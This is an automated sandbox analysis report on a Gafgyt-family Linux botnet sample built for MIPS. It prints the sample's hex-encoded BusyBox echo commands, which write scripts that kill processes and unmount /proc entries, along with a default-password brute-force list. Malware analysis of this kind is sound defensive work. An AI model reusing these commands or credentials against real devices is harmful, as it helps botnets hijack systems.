Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:mpsl.elf
Analysis ID:1660217
MD5:5abd0891a6ecdfb5ef8fbeb1a4fc008b
SHA1:2c72436f58832dd88c9cff1832834f02f7d4ce1c
SHA256:7580c54b9b7ee808e4b2d097b9f228b42852e8d6173cb7833e610cbd4146b122
Tags:elf, user-abuse_ch

Detection

Score:52
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Sample reads /proc/mounts (often used for finding a writable filesystem)
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1660217
Start date and time:2025-04-09 06:00:44 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 8s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mpsl.elf
Detection:MAL
Classification:mal52.troj.linELF@0/2@0/0
Command:/tmp/mpsl.elf
PID:6259
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • mpsl.elf (PID: 6259, Parent: 6183, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf
    • mpsl.elf New Fork (PID: 6264, Parent: 6259)
  • dash New Fork (PID: 6323, Parent: 4331)
  • rm (PID: 6323, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
  • dash New Fork (PID: 6324, Parent: 4331)
  • rm (PID: 6324, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
  • cleanup
No yara matches
No Suricata rule has matched

AV Detection

Source: mpsl.elf, ReversingLabs: Detection: 33%
Source: mpsl.elf, Virustotal: Detection: 37%
Source: /tmp/mpsl.elf (PID: 6264), Socket: 127.0.0.1:22448
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown, TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown, TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown, TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown, TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown, TCP traffic detected without corresponding DNS query: 34.249.145.219
Source: unknown, TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 39258
Source: unknown, Network traffic detected: HTTP traffic on port 39258 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sample, String containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sample, String containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample, String containing potential weak password found: 12345
Source: Initial sample, String containing potential weak password found: 54321
Source: Initial sample, String containing potential weak password found: 654321
Source: Initial sample, String containing potential weak password found: admin1234
Source: Initial sample, String containing potential weak password found: administrator
Source: Initial sample, String containing potential weak password found: supervisor
Source: Initial sample, String containing potential weak password found: password
Source: Initial sample, String containing potential weak password found: default
Source: Initial sample, String containing potential weak password found: guest
Source: Initial sample, String containing potential weak password found: service
Source: Initial sample, String containing potential weak password found: support
Source: ELF static info symbol of initial sample, .symtab present: no
Source: classification engine, Classification label: mal52.troj.linELF@0/2@0/0

Persistence and Installation Behavior

Source: /tmp/mpsl.elf (PID: 6259) File: /proc/6259/mounts
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1582/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1582/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/3088/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/230/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/110/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/231/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/111/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/232/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1579/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1579/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/112/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/233/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1699/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1699/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/113/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/234/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1335/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1698/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1698/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/114/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/235/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1334/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1576/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2302/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2302/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/115/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/236/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/116/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/237/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/117/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/118/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/910/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/119/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/912/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/10/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2307/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2307/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/11/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/918/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/12/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/13/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/6243/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/14/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/15/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/16/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/6244/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/17/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/18/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/4740/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1594/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1594/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/120/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/121/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1349/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1349/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/122/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/243/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/123/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/2/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/124/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/3/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/4/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/125/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/126/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1344/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1465/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1586/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1586/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/127/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/6/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/248/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/128/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/249/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1463/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/800/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/9/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/801/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/20/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/21/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1900/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/22/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/23/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/24/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/25/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/26/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/27/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/28/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/29/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/491/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/250/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/130/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/251/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/252/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/132/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/253/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/254/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/255/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/256/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1599/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/257/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1477/maps
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/1477/exe
Source: /tmp/mpsl.elf (PID: 6259)File opened: /proc/379/maps
Source: /usr/bin/dash (PID: 6323) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
Source: /usr/bin/dash (PID: 6324) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
Source: /tmp/mpsl.elf (PID: 6259) Queries kernel information via 'uname':
Source: mpsl.elf, 6259.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmp, mpsl.elf, 6264.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmp, Binary or memory string: 1Zm6vnZ5U4mf8vApyWcDwXR44ZAkzslsN1!a1gCWFxqAHsFWFMWRHVDR44!!a1gCWFxqAHsFWFMWT3YA)D!!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
Source: mpsl.elf, 6259.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, Binary or memory string: /tmp/qemu-open.98URIt
Source: mpsl.elf, 6259.1.0000561c9637d000.0000561c96424000.rw-.sdmp, mpsl.elf, 6264.1.0000561c9637d000.0000561c96424000.rw-.sdmp, Binary or memory string: /etc/qemu-binfmt/mipsel
Source: mpsl.elf, 6259.1.0000561c9637d000.0000561c96424000.rw-.sdmp, mpsl.elf, 6264.1.0000561c9637d000.0000561c96424000.rw-.sdmp, Binary or memory string: V!/etc/qemu-binfmt/mipsel
Source: mpsl.elf, 6264.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmp, Binary or memory string: vmware
Source: mpsl.elf, 6259.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmp, mpsl.elf, 6264.1.00007fc8dc43f000.00007fc8dc447000.rw-.sdmp, Binary or memory string: qemu-arm
Source: mpsl.elf, 6264.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, Binary or memory string: Vqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: mpsl.elf, 6259.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, mpsl.elf, 6264.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
Source: mpsl.elf, 6259.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, Binary or memory string: V/tmp/qemu-open.98URIt\
Source: mpsl.elf, 6259.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, mpsl.elf, 6264.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, Binary or memory string: /usr/bin/qemu-mipsel
Source: mpsl.elf, 6264.1.00007ffd121a4000.00007ffd121c5000.rw-.sdmp, Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
MITRE ATT&CK Matrix (techniques with matching signatures carry the number of matches in parentheses):

Reconnaissance: Gather Victim Identity Information; Credentials
Resource Development: Acquire Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job
Persistence: Path Interception; Boot or Logon Initialization Scripts
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts
Defense Evasion: File Deletion (1); Rootkit
Credential Access: OS Credential Dumping (1); Brute Force (1)
Discovery: Security Software Discovery (11); File and Directory Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol
Collection: Data from Local System; Data from Removable Media
Command and Control: Encrypted Channel (1); Application Layer Protocol (1)
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
Impact: Abuse Accessibility Features; Network Denial of Service
No configs have been found
Behavior Graph ID: 1660217, Sample: mpsl.elf, Start date: 09/04/2025, Architecture: LINUX, Score: 52. Graph nodes: 109.202.202.202:80 (INIT7CH, Switzerland); 91.189.91.42:443 (CANONICAL-ASGB, United Kingdom); 2 other IPs or domains; signature "Multi AV Scanner detection for submitted file"; processes started: mpsl.elf, dash -> rm, dash -> rm; mpsl.elf starts a child mpsl.elf; signature "Sample reads /proc/mounts (often used for finding a writable filesystem)" on mpsl.elf.

Source    Detection  Scanner        Label
mpsl.elf  33%        ReversingLabs  Linux.Backdoor.Gafgyt
mpsl.elf  38%        Virustotal
No Antivirus matches
No contacted domains info
IP              Domain   Country         ASN    ASN Name        Malicious
34.249.145.219  unknown  United States   16509  AMAZON-02US     false
109.202.202.202 unknown  Switzerland     13030  INIT7CH         false
91.189.91.43    unknown  United Kingdom  41231  CANONICAL-ASGB  false
91.189.91.42    unknown  United Kingdom  41231  CANONICAL-ASGB  false
No context
Process:/tmp/mpsl.elf
File Type:ASCII text
Category:dropped
Size (bytes):362
Entropy (8bit):3.7946852578785095
Encrypted:false
SSDEEP:6:URA/tIgDF6Fk7CY/VmsDF6FfKyVPj/VKAvVVyAb/3hM/V+4D/VH:IA/fkGfkxKyyaVIAbRMfF
MD5:8626E24C6C375B0C8466940FC112645A
SHA1:2136BA9FFB8B60A4928B6452CA8D1CD07ECA49F7
SHA-256:98B805DF166243F79DA32E0DE9EEA74C1AEDBFA8B6DD8FA388DE53B74F3A7D40
SHA-512:A497A7DA93E453F683100984BBC1B17516A6CD88206304AD36741ABF65D15683FB7E2F896C0EED4FBEFAB29C4ED81F49A8416F5985757645AE65E3264F3E4C71
Malicious:false
Reputation:low
Preview:
400000-42e000 r-xp 00000000 fd:00 531606 /tmp/mpsl.elf
43e000-43f000 rw-p 0002e000 fd:00 531606 /tmp/mpsl.elf
43f000-445000 rw-p 00000000 00:00 0
7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f7ff000-7f800000 ---p 00000000 00:00 0
7f800000-80000000 rw-p 00000000 00:00 0 [stack]

Process:/tmp/mpsl.elf
File Type:ASCII text
Category:dropped
Size (bytes):362
Entropy (8bit):3.7946852578785095
Encrypted:false
SSDEEP:6:URA/tIgDF6Fk7CY/VmsDF6FfKyVPj/VKAvVVyAb/3hM/V+4D/VH:IA/fkGfkxKyyaVIAbRMfF
MD5:8626E24C6C375B0C8466940FC112645A
SHA1:2136BA9FFB8B60A4928B6452CA8D1CD07ECA49F7
SHA-256:98B805DF166243F79DA32E0DE9EEA74C1AEDBFA8B6DD8FA388DE53B74F3A7D40
SHA-512:A497A7DA93E453F683100984BBC1B17516A6CD88206304AD36741ABF65D15683FB7E2F896C0EED4FBEFAB29C4ED81F49A8416F5985757645AE65E3264F3E4C71
Malicious:false
Reputation:low
Preview:
400000-42e000 r-xp 00000000 fd:00 531606 /tmp/mpsl.elf
43e000-43f000 rw-p 0002e000 fd:00 531606 /tmp/mpsl.elf
43f000-445000 rw-p 00000000 00:00 0
7f7fe000-7f7ff000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f7ff000-7f800000 ---p 00000000 00:00 0
7f800000-80000000 rw-p 00000000 00:00 0 [stack]

File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):5.143485756645029
TrID:
  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:mpsl.elf
File size:190'848 bytes
MD5:5abd0891a6ecdfb5ef8fbeb1a4fc008b
SHA1:2c72436f58832dd88c9cff1832834f02f7d4ce1c
SHA256:7580c54b9b7ee808e4b2d097b9f228b42852e8d6173cb7833e610cbd4146b122
SHA512:ab91740ffc077b5808fe9ed7280fb1fde5aaef68dd934a0637ca6aedafe771bb2cd04dac23c8dbd7acda1a031f052587af74c0f1b3734ad46cc0df5bc515a199
SSDEEP:1536:cchMHxAJL5x1Yu4o2tIMOrMiNHbDrVmPHY0NyakOtsElddTlnOArV:cchaxAJdfj4EWY0BBd5
TLSH:BD148486BF503EFFC85ECD3751A4CA0A129C895D5294BFB66A34E414B68B10E99C3C9C
File Content Preview:.ELF....................`.@.4...x.......4. ...(...............@...@.`...`...............<...<.C.<.C......O..........Q.td...............................'...................<xa.'!.............9'.. ........................<Ha.'!... .........9'.. ............

ELF header

Class:ELF32
Data:2's complement, little endian
Version:1 (current)
Machine:MIPS R3000
Version Number:0x1
Type:EXEC (Executable file)
OS/ABI:UNIX - System V
ABI Version:0
Entry Point Address:0x400260
Flags:0x1007
ELF Header Size:52
Program Header Offset:52
Program Header Size:32
Number of Program Headers:3
Section Header Offset:190328
Section Header Size:40
Number of Section Headers:13
Header String Table Index:12
Section headers

Name          Type      Address   Offset   Size     EntSize  Flags       Flags Description  Link  Info  Align
              NULL      0x0       0x0      0x0      0x0      0x0                            0     0     0
.init         PROGBITS  0x400094  0x94     0x7c     0x0      0x6         AX                 0     0     4
.text         PROGBITS  0x400110  0x110    0x2ab70  0x0      0x6         AX                 0     0     16
.fini         PROGBITS  0x42ac80  0x2ac80  0x4c     0x0      0x6         AX                 0     0     4
.rodata       PROGBITS  0x42acd0  0x2acd0  0x2b90   0x0      0x2         A                  0     0     16
.ctors        PROGBITS  0x43e03c  0x2e03c  0x8      0x0      0x3         WA                 0     0     4
.dtors        PROGBITS  0x43e044  0x2e044  0x8      0x0      0x3         WA                 0     0     4
.data.rel.ro  PROGBITS  0x43e050  0x2e050  0x108    0x0      0x3         WA                 0     0     4
.data         PROGBITS  0x43e160  0x2e160  0xd0     0x0      0x3         WA                 0     0     16
.got          PROGBITS  0x43e230  0x2e230  0x4f0    0x4      0x10000003  WAp                0     0     16
.sbss         NOBITS    0x43e720  0x2e720  0x1c     0x0      0x10000003  WAp                0     0     4
.bss          NOBITS    0x43e740  0x2e720  0x4800   0x0      0x3         WA                 0     0     16
.shstrtab     STRTAB    0x0       0x2e720  0x56     0x0      0x0                            0     0     1

Program headers

Type       Offset   Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align    Prog Interpreter  Section Mappings
LOAD       0x0      0x400000         0x400000          0x2d860    0x2d860      5.1777   0x5    R E                0x10000                    .init .text .fini .rodata
LOAD       0x2e03c  0x43e03c         0x43e03c          0x6e4      0x4f04       4.7761   0x6    RW                 0x10000                    .ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK  0x0      0x0              0x0               0x0        0x0          0.0000   0x7    RWE                0x4
  • Total Packets: 10
  • 443 (HTTPS)
  • 80 (HTTP)
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Apr 9, 2025 06:01:55.468121052 CEST  43928        443        192.168.2.23    91.189.91.42
Apr 9, 2025 06:01:56.184232950 CEST  39258        443        192.168.2.23    34.249.145.219
Apr 9, 2025 06:01:56.184278965 CEST  443          39258      34.249.145.219  192.168.2.23
Apr 9, 2025 06:01:56.186703920 CEST  39258        443        192.168.2.23    34.249.145.219
Apr 9, 2025 06:01:56.186703920 CEST  39258        443        192.168.2.23    34.249.145.219
Apr 9, 2025 06:01:56.186736107 CEST  443          39258      34.249.145.219  192.168.2.23
Apr 9, 2025 06:02:01.099386930 CEST  42836        443        192.168.2.23    91.189.91.43
Apr 9, 2025 06:02:15.945324898 CEST  43928        443        192.168.2.23    91.189.91.42
Apr 9, 2025 06:02:17.993110895 CEST  42516        80         192.168.2.23    109.202.202.202
Apr 9, 2025 06:02:28.231614113 CEST  42836        443        192.168.2.23    91.189.91.43
Apr 9, 2025 06:02:56.178708076 CEST  39258        443        192.168.2.23    34.249.145.219
Apr 9, 2025 06:02:56.224287987 CEST  443          39258      34.249.145.219  192.168.2.23
Apr 9, 2025 06:02:56.899787903 CEST  43928        443        192.168.2.23    91.189.91.42

System Behavior

Start time (UTC):04:01:52
Start date (UTC):09/04/2025
Path:/tmp/mpsl.elf
Arguments:/tmp/mpsl.elf
File size:5773336 bytes
MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):04:01:56
Start date (UTC):09/04/2025
Path:/tmp/mpsl.elf
Arguments:-
File size:5773336 bytes
MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):04:02:54
Start date (UTC):09/04/2025
Path:/usr/bin/dash
Arguments:-
File size:129816 bytes
MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):04:02:54
Start date (UTC):09/04/2025
Path:/usr/bin/rm
